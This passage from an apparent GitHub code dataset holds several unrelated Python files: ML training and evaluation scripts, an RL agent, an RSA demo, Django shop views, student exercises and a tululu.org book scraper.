parser.add_argument('--gpu_id', default=0, type=int,\n metavar='N', help='setting gpu id') \n parser.add_argument('--num_classes', default=2, type=int,\n help='number of classes')\n \n args = parser.parse_args()\n\n return args\n \n\ndef data_collate(batch):\n input=None\n target = None\n input_paths = None\n total_num =0\n num_per_patient = []\n for info in batch:\n if total_num==0:\n input = torch.from_numpy(info[0]).unsqueeze(0)\n target = torch.from_numpy(info[1]).unsqueeze(0)\n input_paths = info[3]\n else:\n input = torch.cat((input, torch.from_numpy(info[0]).unsqueeze(0)))\n target = torch.cat((target, torch.from_numpy(info[1]).unsqueeze(0)))\n input_paths = np.dstack((input_paths, info[3]))\n num_per_patient.append(info[2])\n total_num+=1\n\n return input.float(), target, num_per_patient, input_paths, info[4]\n\n\n\n\ndef main():\n args = parse_args()\n model_dir = args.model_dir\n\n yml = os.path.join(model_dir, 'config.yml')\n\n with open(yml, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n print('-'*20)\n for key in config.keys():\n print('%s: %s' % (key, str(config[key])))\n print('-'*20)\n\n\n cudnn.benchmark = True\n \n print(\"=> creating model %s\" % config['arch'])\n model_seg = archs.__dict__[config['arch']](args.num_classes,\n config['input_channels'])\n \n \n model_seg = model_seg.cuda()\n \n model_seg_path = os.path.join(model_dir, 'model_seg_240.pth')\n\n checkpoint = torch.load(model_seg_path) \n pretrain_dict = checkpoint['state_dict']\n \n new_dict = OrderedDict()\n\n for k, v in pretrain_dict.items():\n if k.startswith(\"module\"):\n k = k[7:]\n new_dict[k] = v\n \n model_dict = model_seg.state_dict()\n model_dict.update(new_dict)\n model_seg.load_state_dict(model_dict)\n\n\n model_seg.eval()\n\n torch.cuda.set_device(args.gpu_id)\n\n test_transform = transforms.Compose([ \n transforms.Resize(256),\n transforms.CenterCrop(160),\n ])\n\n test_dataset = Dataset(\n data_txt = args.test_txt,\n img_ext = 'png',\n mask_ext= 'png',\n semi_setting=False, \n label_factor_semi = None, \n transform=test_transform,\n rotate_flip=False,\n random_whd_crop = False,\n crop_hw = 128,\n depth = None)\n\n\n test_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=1,\n shuffle=False,\n collate_fn = data_collate,\n num_workers=config['num_workers'],\n drop_last=False)\n\n avg_meters = {'dice': AverageMeter(),\n 'jaccord': AverageMeter(), \n 'hd95': AverageMeter(),\n 'asd': AverageMeter()}\n\n with torch.no_grad():\n for input, target, _, _, _, in tqdm(test_loader, total=len(test_loader)):\n input = input.cuda()\n target = target.cuda()\n T = 1\n out_seg = None\n out_seg_ = None\n \n for ii in range(T):\n input = input.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n input_ = torch.transpose(input_var, 1, 2)\n target_ = torch.transpose(target_var, 1, 2)\n out_map, score_map = test_single_case(model_seg, input_, 8, 8, patch_size=(args.input_crop, args.input_crop, args.depth), num_classes=args.num_classes) \n if ii == 0:\n out_seg = score_map\n out_seg_ = out_map\n else:\n out_seg = out_seg + score_map\n out_seg_ = out_seg_ + out_map\n\n output = out_seg/T \n\n dice = dice_coef(output, target_)\n jaccord = Jaccord(output, target_)\n hd = HD(output, target_)\n asd = ASD(output, target_)\n \n avg_meters['dice'].update(dice, input.size(0))\n avg_meters['jaccord'].update(jaccord, input.size(0))\n avg_meters['hd95'].update(hd, input.size(0))\n avg_meters['asd'].update(asd, input.size(0))\n \n\n\n print('Dice: %.4f' % avg_meters['dice'].avg)\n print('Jaccord: %.4f' % avg_meters['jaccord'].avg)\n print('hd95: %.4f' % avg_meters['hd95'].avg)\n print('asd: %.4f' % avg_meters['asd'].avg)\n\n torch.cuda.empty_cache()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tejas-parmar-24/GBDL","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"16413744089","text":"import pandas\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Flatten, InputLayer\nfrom keras import backend as K\nfrom os import path\nfrom distutils.version import LooseVersion as LV\nfrom keras import __version__\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom keras.optimizers import SGD\nfrom sklearn import preprocessing, metrics\n\nsns.set()\n\n\ndef recall_m(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n\ndef precision_m(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n\ndef f1_m(y_true, y_pred):\n precision = precision_m(y_true, y_pred)\n recall = recall_m(y_true, y_pred)\n return 2 * ((precision * recall) / (precision + recall + K.epsilon()))\n\n\nprint('Using Keras version:', __version__, 'backend:', K.backend())\nassert (LV(__version__) >= LV(\"2.0.0\"))\n\noutput = 'outputs/mlp_multiclass/'\n# Data preprocessing\nif not path.exists(output + 'X.npy'):\n vector_path = 'outputs/subject_classification_dataset_0.txt'\n v = np.loadtxt(vector_path, delimiter=',', dtype='str', encoding='utf8')\n np.random.shuffle(v)\n # v = v[:100,:]\n X = v[:, :-1].astype('float')\n Y = v[:, -1]\n Y = np.array(pandas.get_dummies(Y))\n # Y = Y.values.argmax(1)\n np.save(output + 'X', X)\n np.save(output + 'Y', Y)\nelse:\n X = np.load(output + 'X.npy')\n Y = np.load(output + 'Y.npy')\n\n# Y = np.array(Y)\n# print(Y)\n# print(Y.shape)\nY = Y[:, 1:]\n# X = X[:, :300]\nX = preprocessing.scale(X)\n# print(X)\n# print(Y)\n# print(X.shape)\n# print(Y.shape)\n# X = X[93145:93245, :]\n# Y = Y[93145:93245]\n# Y = (Y > 10).astype(int)\nrecord_count = X.shape[0]\nclass_count = Y.shape[1]\ninput_size = X.shape[1]\ntrain_size = int(0.2 * record_count)\nX_train = X[:train_size, :]\nX_train = X_train.astype('float32')\nX_test = X[train_size:, :]\nY_train = Y[:train_size, :]\nY_test = Y[train_size:, :]\n\nprint()\nprint('data loaded: train:', len(X_train), 'test:', len(X_test))\n\n# Model architecture\nmodel = Sequential()\nmodel.add(InputLayer(input_shape=(input_size,)))\nmodel.add(Dense(units=100))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\n# model.add(Dense(units=40))\n# model.add(Activation('relu'))\n# model.add(Dropout(0.4))\nmodel.add(Dense(units=class_count, activation='softmax'))\n\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='sgd',\n metrics=['accuracy'])\n\nprint(model.summary())\n\n# Learning\nepochs = 20 # one epoch with simple model takes about 4 seconds\n\nhistory = model.fit(X_train, Y_train,\n epochs=epochs,\n batch_size=4,\n verbose=2)\n\n# Curves\nplt.figure(figsize=(5, 3))\nplt.plot(history.epoch, history.history['loss'])\nplt.title('loss')\n\nmodel.save('outputs/mlp_model')\n# plt.show()\n\n\n# plt.figure(figsize=(5, 3))\n# plt.plot(history.epoch, history.history['acc'])\n# plt.title('accuracy')\n\n# Inference\nscores = model.evaluate(X_test, Y_test, verbose=2)\nfor i in range(1, len(scores)):\n print(\"%s: %.2f%%\" % (model.metrics_names[i], scores[i] * 100))\n\n# predictions = model.predict(X_test)\n#\n# show_failures(predictions)\n","repo_name":"ftmkk/WAN2Vec_Tarvajeh","sub_path":"test_mlp_multiclass.py","file_name":"test_mlp_multiclass.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6381456337","text":"import torch\nfrom torch import optim, nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom util.replay_buffer import ReplayBuffer\n\n\nclass Actor(nn.Module):\n\tdef __init__(self, input_dims, fc1_dims, fc2_dims, n_actions, lr=1e-3):\n\t\tsuper(Actor, self).__init__()\n\t\tself.fc1 = nn.Linear(*input_dims, fc1_dims)\n\t\tself.fc2 = nn.Linear(fc1_dims, fc2_dims)\n\t\tself.fc3 = nn.Linear(fc2_dims, n_actions)\n\t\tself.optimizer = optim.Adam(self.parameters(), lr)\n\t\tself.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\t\tself.to(self.device)\n\n\tdef loss(self, y_pred, y_true, q_value):\n\t\ty_pred = torch.clip(y_pred, 1e-8, 1 - 1e-8)\n\t\tlog_prob = y_true * torch.log(y_pred)\n\t\treturn torch.sum(-q_value * log_prob)\n\n\tdef forward(self, x):\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.relu(self.fc2(x))\n\t\tx = F.softmax(self.fc3(x), dim=1)\n\t\treturn x\n\n\nclass Critic(nn.Module):\n\tdef __init__(self, input_dims, fc1_dims, fc2_dims, n_actions, lr=1e-3):\n\t\tsuper(Critic, self).__init__()\n\t\tself.fc1 = nn.Linear(*input_dims, fc1_dims)\n\t\tself.fc2 = nn.Linear(fc1_dims, fc2_dims)\n\t\tself.fc3 = nn.Linear(fc2_dims, n_actions)\n\t\tself.loss = nn.MSELoss()\n\t\tself.optimizer = optim.Adam(self.parameters(), lr)\n\t\tself.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\t\tself.to(self.device)\n\n\tdef forward(self, x):\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.relu(self.fc2(x))\n\t\tx = self.fc3(x)\n\t\treturn x\n\n\nclass ActorCriticAgent:\n\tdef __init__(self, gamma, input_dims, fc1_dims, fc2_dims, n_actions, batch_size=32, lr=1e-3):\n\t\tself.gamma = gamma\n\t\tself.n_actions = n_actions\n\t\tself.batch_size = batch_size\n\t\tself.buffer = ReplayBuffer(input_dims, batch_size)\n\t\tself.actor = Actor(input_dims, fc1_dims, fc2_dims, n_actions, lr)\n\t\tself.critic = Critic(input_dims, fc1_dims, fc2_dims, n_actions, lr)\n\t\tself.state_memory = []\n\t\tself.next_state_memory = []\n\t\tself.action_memory = []\n\t\tself.reward_memory = []\n\t\tself.terminal_memory = []\n\n\tdef store_transition(self, state, action, reward, next_state, done):\n\t\tself.state_memory.append(state)\n\t\tself.action_memory.append(action)\n\t\tself.reward_memory.append(reward)\n\t\tself.next_state_memory.append(next_state)\n\t\tself.terminal_memory.append(done)\n\t\tself.buffer.store_transition(state, action, reward, next_state, done)\n\n\tdef clear_memory(self):\n\t\tself.state_memory = []\n\t\tself.next_state_memory = []\n\t\tself.action_memory = []\n\t\tself.reward_memory = []\n\t\tself.terminal_memory = []\n\n\tdef choose_action(self, state):\n\t\tstate = state.astype(np.float32)\n\t\tstate = torch.tensor(state).unsqueeze(0).to(self.actor.device)\n\t\tprob_vec = self.actor(state).ravel().cpu().detach().numpy()\n\t\treturn np.random.choice(self.n_actions, p=prob_vec)\n\n\tdef learn(self):\n\t\t# train actor\n\t\tstates = np.array(self.state_memory).astype(np.float32)\n\t\tstates = torch.tensor(states).to(self.actor.device)\n\t\tprob_vecs = self.actor(states)\n\t\taction_vecs = torch.zeros_like(prob_vecs)\n\t\tindices = np.arange(len(prob_vecs))\n\t\tactions = np.array(self.action_memory)\n\t\taction_vecs[indices, actions] = 1\n\t\tq_values = self.critic(states)[indices, actions].unsqueeze(1)\n\n\t\tself.actor.optimizer.zero_grad()\n\t\tloss = self.actor.loss(prob_vecs, action_vecs, q_values)\n\t\tloss.backward()\n\t\tself.actor.optimizer.step()\n\n\t\t# train critic\n\t\tif len(self.buffer) < self.batch_size:\n\t\t\treturn\n\n\t\tindices = np.arange(self.batch_size)\n\t\tstates, actions, rewards, next_states, dones = self.buffer.batch()\n\t\tstates = torch.tensor(states).to(self.critic.device)\n\t\tnext_states = torch.tensor(next_states).to(self.critic.device)\n\t\trewards = torch.tensor(rewards).to(self.critic.device)\n\t\tdones = torch.tensor(dones).to(self.critic.device)\n\t\tcurrent_qs = self.critic(states)[indices, actions]\n\t\tnext_qs = self.critic(next_states)\n\t\tnext_qs[dones] = 0\n\t\ttarget_qs = rewards + self.gamma * torch.max(next_qs, dim=1)[0]\n\n\t\tself.critic.optimizer.zero_grad()\n\t\tloss = self.critic.loss(current_qs, target_qs)\n\t\tloss.backward()\n\t\tself.critic.optimizer.step()\n","repo_name":"aarunsrinivas/reinforcement-learning","sub_path":"ac/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21935612072","text":"#Create a binary file with roll number, name and marks. Input a roll number and update the marks.\n\n\ndef update(file): \n import pickle\n file = open(file,\"rb\")\n data = pickle.load(file)\n a = int(input(\"Enter the roll number\"))\n for i in data:\n if a == i[0]:\n b = input(\"Enter Name\")\n c = int(input(\"Enter Marks\"))\n updated_records = [a,b,c]\n else:\n print(\"The records don't exist\")\n file.close()\n f = open(file,\"wb+\")\n pickle.dump(updated_records, f)\n print(\"Updated the records\")\nupdate(\"Sample.dat\")\n","repo_name":"AbhijithGanesh/School-Computer-Science-Lab","sub_path":"4.P4.py","file_name":"4.P4.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38075308171","text":"# --------------------------------------------------------\n# Based on BEiT code bases\n# Integrate BEiT for Federated Learning\n# Reference: https://github.com/microsoft/unilm/tree/master/beit\n# Author: Rui Yan\n# --------------------------------------------------------\n\nimport math\nfrom typing import Iterable, Optional\n\nimport torch\n\nfrom timm.data import Mixup\nfrom timm.utils import accuracy, ModelEma\n\nimport os\nimport sys\nsys.path.append(os.path.abspath('..'))\nimport util.misc as misc\n\ndef train_class_batch(model, samples, target, criterion):\n outputs = model(samples)\n loss = criterion(outputs, target)\n return loss, outputs\n\n\ndef get_loss_scale_for_deepspeed(model):\n optimizer = model.optimizer\n return optimizer.loss_scale if hasattr(optimizer, \"loss_scale\") else optimizer.cur_scale\n\n\ndef train_one_epoch(args, model: torch.nn.Module, criterion: torch.nn.Module,\n data_loader: Iterable, optimizer: torch.optim.Optimizer,\n device: torch.device, epoch: int, loss_scaler, \n cur_single_client,\n max_norm: float = 0,\n proxy_single_client=None,log_writer=None,\n model_ema: Optional[ModelEma] = None, \n mixup_fn: Optional[Mixup] = None, \n start_steps=None, lr_schedule_values=None, wd_schedule_values=None,\n num_training_steps_per_inner_epoch=None, update_freq=None):\n model.train(True)\n metric_logger = misc.MetricLogger(delimiter=\" \")\n metric_logger.add_meter('lr', misc.SmoothedValue(window_size=1, fmt='{value:.6f}'))\n metric_logger.add_meter('min_lr', misc.SmoothedValue(window_size=1, fmt='{value:.6f}'))\n header = 'Epoch: [{}]'.format(epoch)\n print_freq = 10\n\n if loss_scaler is None:\n model.zero_grad()\n model.micro_steps = 0\n else:\n optimizer.zero_grad()\n\n for data_iter_step, (samples, targets) in enumerate(metric_logger.log_every(data_loader, print_freq, header)):\n step = data_iter_step // update_freq\n if step >= num_training_steps_per_inner_epoch:\n continue\n \n it = start_steps + step # global training iteration\n # print('start_steps: ', start_steps)\n # print('local_step: ', step)\n # print('iter: ', it)\n args.global_step_per_client[proxy_single_client] += 1\n # args.global_step_per_client[proxy_single_client] = it\n # Update LR & WD for the first acc\n if lr_schedule_values is not None or wd_schedule_values is not None and data_iter_step % update_freq == 0:\n for i, param_group in enumerate(optimizer.param_groups):\n if lr_schedule_values is not None:\n param_group[\"lr\"] = lr_schedule_values[it] * param_group[\"lr_scale\"]\n if wd_schedule_values is not None and param_group[\"weight_decay\"] > 0:\n param_group[\"weight_decay\"] = wd_schedule_values[it]\n\n samples = samples.to(device, non_blocking=True)\n targets = targets.to(device, non_blocking=True)\n\n if mixup_fn is not None:\n samples, targets = mixup_fn(samples, targets)\n\n if loss_scaler is None:\n samples = samples.half()\n loss, output = train_class_batch(\n model, samples, targets, criterion)\n else:\n with torch.cuda.amp.autocast():\n loss, output = train_class_batch(\n model, samples, targets, criterion)\n\n loss_value = loss.item()\n\n if not math.isfinite(loss_value):\n print(\"Loss is {}, stopping training\".format(loss_value))\n sys.exit(1)\n\n if loss_scaler is None:\n loss /= update_freq\n model.backward(loss)\n model.step()\n\n if (data_iter_step + 1) % update_freq == 0:\n # model.zero_grad()\n # Deepspeed will call step() & model.zero_grad() automatic\n if model_ema is not None:\n model_ema.update(model)\n grad_norm = None\n loss_scale_value = get_loss_scale_for_deepspeed(model)\n else:\n # this attribute is added by timm on one optimizer (adahessian)\n is_second_order = hasattr(optimizer, 'is_second_order') and optimizer.is_second_order\n loss /= update_freq\n grad_norm = loss_scaler(loss, optimizer, clip_grad=max_norm,\n parameters=model.parameters(), create_graph=is_second_order,\n update_grad=(data_iter_step + 1) % update_freq == 0)\n if (data_iter_step + 1) % update_freq == 0:\n optimizer.zero_grad()\n if model_ema is not None:\n model_ema.update(model)\n loss_scale_value = loss_scaler.state_dict()[\"scale\"]\n \n torch.cuda.synchronize()\n\n if mixup_fn is None:\n class_acc = (output.max(-1)[-1] == targets).float().mean()\n else:\n class_acc = None\n metric_logger.update(loss=loss_value)\n metric_logger.update(class_acc=class_acc)\n metric_logger.update(loss_scale=loss_scale_value)\n min_lr = 10.\n max_lr = 0.\n for group in optimizer.param_groups:\n min_lr = min(min_lr, group[\"lr\"])\n max_lr = max(max_lr, group[\"lr\"])\n\n metric_logger.update(lr=max_lr)\n metric_logger.update(min_lr=min_lr)\n weight_decay_value = None\n for group in optimizer.param_groups:\n if group[\"weight_decay\"] > 0:\n weight_decay_value = group[\"weight_decay\"]\n metric_logger.update(weight_decay=weight_decay_value)\n metric_logger.update(grad_norm=grad_norm)\n \n args.learning_rate_record[proxy_single_client].append(optimizer.param_groups[0]['lr'])\n \n # gather the stats from all processes\n print(\"Averaged stats (before sync):\", metric_logger)\n metric_logger.synchronize_between_processes()\n print(\"Averaged stats:\", metric_logger)\n \n if log_writer is not None:\n for k, v in metric_logger.meters.items():\n if k in ['lr', 'min_lr', 'weight_decay', 'grad_norm', 'loss_scale']:\n log_writer.writer.add_scalar(proxy_single_client +'/opt/'+ k, v.global_avg, log_writer.step) \n elif k in ['loss', 'class_acc', 'loss_scale']:\n # print('hey: ', k, v.global_avg)\n log_writer.writer.add_scalar(proxy_single_client +'/loss/'+ k, v.global_avg, log_writer.step) \n \n # log_writer.update(loss=loss_value, head=proxy_single_client + \"/loss\")\n # log_writer.update(class_acc=class_acc, head=proxy_single_client + \"/loss\")\n # log_writer.update(loss_scale=loss_scale_value, head=proxy_single_client + \"/opt\")\n # log_writer.update(lr=max_lr, head=proxy_single_client + \"/opt\")\n # log_writer.update(min_lr=min_lr, head=proxy_single_client + \"/opt\")\n # log_writer.update(weight_decay=weight_decay_value, head=proxy_single_client + \"/opt\")\n # log_writer.update(grad_norm=grad_norm, head=proxy_single_client + \"/opt\")\n \n log_writer.set_step()\n \n args.current_acc[cur_single_client] = metric_logger.get_class_acc()\n \n print('best_acc:', args.best_acc[cur_single_client])\n print('current_acc:', args.current_acc[cur_single_client])\n if args.best_acc[cur_single_client] < args.current_acc[cur_single_client]:\n args.best_acc[cur_single_client] = args.current_acc[cur_single_client]\n \n return {k: meter.global_avg for k, meter in metric_logger.meters.items()}\n\n\n@torch.no_grad()\ndef evaluate(data_loader, model, device):\n criterion = torch.nn.CrossEntropyLoss()\n \n metric_logger = misc.MetricLogger(delimiter=\" \")\n header = 'Test:'\n\n # switch to evaluation mode\n model.eval()\n\n for batch in metric_logger.log_every(data_loader, 10, header):\n images = batch[0]\n target = batch[-1]\n images = images.to(device, non_blocking=True)\n target = target.to(device, non_blocking=True)\n\n # compute output\n with torch.cuda.amp.autocast():\n output = model(images)\n loss = criterion(output, target)\n\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n\n batch_size = images.shape[0]\n metric_logger.update(loss=loss.item())\n metric_logger.meters['acc1'].update(acc1.item(), n=batch_size)\n metric_logger.meters['acc5'].update(acc5.item(), n=batch_size)\n \n # gather the stats from all processes\n print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}'\n .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss))\n\n return {k: meter.global_avg for k, meter in metric_logger.meters.items()}\n","repo_name":"rui-yan/SSL-FL","sub_path":"code/fed_beit/engine_for_finetuning.py","file_name":"engine_for_finetuning.py","file_ext":"py","file_size_in_byte":8926,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"67"} +{"seq_id":"37181617398","text":"'''\nExercício Python 062: Melhore o DESAFIO 061, perguntando para o usuário se ele quer mostrar mais alguns termos.\nO programa encerrará quando ele disser que quer mostrar 0 termos.\n'''\n'''meu codigo\nprint(' '*5 + 'Gerador de PA')\nprint('-='*10)\ntermo = int(input('Primeiro Termo: '))\nrazao = int(input('Razão: '))\ncont = 1\nvar_termor = 10\nwhile cont <= var_termor:\n\tif cont == 1:\n\t\tprint(termo, end=' -> ')\n\telse:\n\t\ttermo += razao\n\t\tprint(termo, end=' -> ')\n\tif cont == var_termor:\n\t\tprint('Pausa!')\n\t\tt = int(input('Quantos termos você quer mostrar a mais? '))\n\t\tif t == 0:\n\t\t\tbreak\n\t\telse:\n\t\t\tcont = 1\n\t\t\tvar_termor = t\n\tcont += 1\n'''\nprint('Gerador de PA')\nprint('-=' * 10)\nprimeiro = int(input('Primeiro Termo: '))\nrazao = int(input('Razão da PA: '))\ntermo = primeiro\ncont = 1\ntotal = 0\nmais = 10\n\nwhile mais != 0:\n\ttotal += mais\n\twhile cont <= total:\n\t\tprint('{} -> '.format(termo), end='')\n\t\ttermo += razao\n\t\tcont += 1\n\tprint('Pausa')\n\tmais = int(input('Quantos termos você quer mostrar a mais? '))\nprint('Progresão finalizada com {} termos mostrados.'.format(total))\n\n\n","repo_name":"gglsilva/estudosPython","sub_path":"estrutural/Curso_em_Video/ex062.py","file_name":"ex062.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13010216287","text":"# __author__ = 'Administrator'\n#\n# api_dict= {\n# 'k1':'v1',\n# 'k2':'v2',\n# 'k3':'v3',\n# }\n# for k in list(api_dict.keys()):\n# v = api_dict[k]\n# if v == 'v2':\n# del api_dict[k]\n# print(api_dict)\n# # for k,v in api_dict.keys():\n# # if v == 'v2':\n# # del api_dict[k]\n\nimport rsa\nimport base64\n\n\n# ######### 1. 生成公钥私钥 #########\npub_key_obj, priv_key_obj = rsa.newkeys(256)\n\npub_key_str = pub_key_obj.save_pkcs1()\npub_key_code = base64.standard_b64encode(pub_key_str)\n\npriv_key_str = priv_key_obj.save_pkcs1()\npriv_key_code = base64.standard_b64encode(priv_key_str)\n\nprint(pub_key_code,type(pub_key_code))\nprint(priv_key_code,type(priv_key_code))\n\n# ######### 2. 加密 #########\ndef encrypt(value):\n key_str = base64.standard_b64decode(pub_key_code)\n pk = rsa.PublicKey.load_pkcs1(key_str)\n val = rsa.encrypt(value.encode('utf-8'), pk)\n return val\n\n\n# ######### 3. 解密 #########\ndef decrypt(value):\n key_str = base64.standard_b64decode(priv_key_code)\n pk = rsa.PrivateKey.load_pkcs1(key_str)\n val = rsa.decrypt(value, pk)\n return val\n\n\n# ######### 基本使用 #########\nif __name__ == '__main__':\n v = 'wupeiqi'\n v1 = encrypt(v)\n print(v1)\n v2 = decrypt(v1)\n print(v2)","repo_name":"Jiesanc/CMDB","sub_path":"autoserver/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31209126210","text":"from django.core import paginator\nfrom django.shortcuts import render\nfrom .models import order, products\nfrom django.core.paginator import Paginator\n# Create your views here.\n\ndef index(request):\n\n product_objects = products.objects.all()\n template_name = 'shop/index.html'\n # Search funtionality\n item_name = request.GET.get('item_name')\n if item_name != '' and item_name is not None: #For querysets questions please view the page\n product_objects =product_objects.filter(title__icontains = item_name) #https://sodocumentation.net/django/topic/1235/querysets\n\n #Paginator code & link \n #https://docs.djangoproject.com/en/3.2/topics/pagination/\n paginator = Paginator(product_objects,4)\n page_number = request.GET.get('page')\n product_objects = paginator.get_page(page_number)\n\n return render(request,template_name,{'product_objects': product_objects})\n\n\ndef detail(request,obj_id):\n product_objects = products.objects.get(id=obj_id)\n return render(request,'shop/detail.html',{'product_objects':product_objects})\n\ndef checkout(request):\n\n if request.method == 'POST':\n\n items =request.POST.get('items',\"\") #allow the null value thats why put the empty string \"\"\n name = request.POST.get('name',\"\")\n email = request.POST.get('email',\"\")\n address = request.POST.get('address',\"\")\n city = request.POST.get('city',\"\")\n state = request.POST.get('state',\"\")\n zipcode = request.POST.get('zipcode',\"\")\n total = request.POST.get('total','')\n order_list = order( items = items,name = name, email = email, address = address, city = city, state = state, zipcode = zipcode,total = total)\n order_list.save()\n\n return render(request,'shop/checkout.html')\n","repo_name":"antony-praveen/Ecom","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"30076536613","text":"\r\nclass Question4():\r\n\r\n def __init__(self, input_str):\r\n\r\n self.str_ = input_str\r\n\r\n def palindrome(self, string_):\r\n\r\n if(len(string_) != len(self.str_)):\r\n\r\n return False\r\n\r\n print('Palindrome check running..')\r\n\r\n count = 0\r\n string_rev = string_[::-1]\r\n\r\n print('Reversed string: ', string_rev)\r\n print('Original string: ', string_)\r\n \r\n if(len(self.str_) != len(string_rev)):\r\n\r\n print('This executed')\r\n \r\n return False \r\n\r\n else:\r\n\r\n for i in range(len(self.str_)):\r\n\r\n if(self.str_[i] == string_rev[i]):\r\n\r\n count = count + 1\r\n\r\n if(count == len(string_rev)):\r\n\r\n return True\r\n\r\n def permutate(self, str_):\r\n\r\n l = []\r\n\r\n sub_str = ''\r\n\r\n if(len(str_) == 0):\r\n\r\n print('Empty string')\r\n\r\n for i in range(len(str_)-1):\r\n\r\n temp = str_[i]\r\n\r\n sub_str = str_[:i]+str_[i+1:]\r\n\r\n result_permutate = self.permutate(sub_str)\r\n\r\n if(not len(result_permutate) < len(self.str_)-2):\r\n\r\n for i in result_permutate:\r\n \r\n l.append(temp+i)\r\n\r\n if(self.palindrome(l[-1])):\r\n\r\n print(\"Palindrome\")\r\n\r\n return l\r\n\r\n return sub_str\r\n\r\n\r\n def run(self):\r\n\r\n result = self.permutate(self.str_)\r\n\r\n return result\r\n\r\nprint('----------------')\r\n\r\nques = Question4('tenet')\r\n\r\nques.run()","repo_name":"PradeepKumar1994/data-structures-and-algorithms","sub_path":"array/question-4/queston-4.py","file_name":"queston-4.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25749924539","text":"import os\nimport requests\n\nfrom bs4 import BeautifulSoup\nfrom argparse import ArgumentParser\nfrom urllib.error import URLError\nfrom pathlib import Path\nfrom dotenv import load_dotenv\nfrom urllib.parse import urljoin\nfrom parse_tululu import (\n check_for_redirect,\n download_image,\n download_txt,\n download_json,\n get_book_params,\n)\n\n\ndef get_args():\n parser = ArgumentParser(\"Select a range of pages to download books\")\n parser.add_argument(\n \"-s\", \"--start_page\", default=1, type=int, help=\"Start page range\"\n )\n parser.add_argument(\n \"-e\", \"--end_page\", default=1, type=int, help=\"End page range\"\n )\n parser.add_argument(\n \"-c\",\n \"--category_id\",\n default=55,\n type=int,\n help=\"ID of the book category\",\n )\n parser.add_argument(\n \"-d\",\n \"--dest_folder\",\n default=\".\",\n type=str,\n help=\"The path where the parsing result will be recorded\",\n )\n parser.add_argument(\n \"-i\",\n \"--skip_imgs\",\n default=False,\n type=bool,\n help=\"Allows you not to download images if it's True\",\n )\n parser.add_argument(\n \"-t\",\n \"--skip_txt\",\n default=False,\n type=bool,\n help=\"Allows you not to download books if it's True\",\n )\n\n return parser.parse_args()\n\n\ndef get_book_id(relative_book_url):\n book_id = \"\".join(filter(str.isdigit, relative_book_url))\n return int(book_id) if book_id else None\n\n\nif __name__ == \"__main__\":\n load_dotenv()\n args = get_args()\n path = args.dest_folder\n\n imgs_folder_path = os.path.join(path, \"images\")\n books_folder_path = os.path.join(path, \"books\")\n Path(imgs_folder_path).mkdir(parents=True, exist_ok=True)\n Path(books_folder_path).mkdir(parents=True, exist_ok=True)\n\n all_books_params = []\n for page in range(args.start_page, args.end_page + 1):\n url = f\"https://tululu.org/l{args.category_id}/{page}/\"\n try:\n response = requests.get(url)\n response.raise_for_status()\n\n soup = BeautifulSoup(response.text, \"lxml\")\n soup_book_urls = soup.find(\"div\", id=\"content\").find_all(\n \"table\", class_=\"d_book\"\n )\n\n for soup_book_url in soup_book_urls:\n relative_book_url = soup_book_url.find(\"a\")[\"href\"]\n book_url = urljoin(url, relative_book_url)\n response = requests.get(book_url)\n response.raise_for_status()\n\n check_for_redirect(response)\n book_id = get_book_id(relative_book_url)\n soup = BeautifulSoup(response.text, \"lxml\")\n (\n title,\n author,\n genres,\n comments,\n img_name,\n img_url,\n ) = get_book_params(soup, url)\n\n if not args.skip_imgs:\n img_src = download_image(\n img_url, img_name, imgs_folder_path\n )\n if not args.skip_txt:\n filename = f\"{book_id}.{title}\"\n book_path = download_txt(\n book_id, filename, books_folder_path\n )\n\n book_params = {\n \"title\": title,\n \"author\": author,\n \"genres\": genres,\n \"comments\": comments,\n \"img_src\": os.path.relpath(img_src),\n \"book_path\": 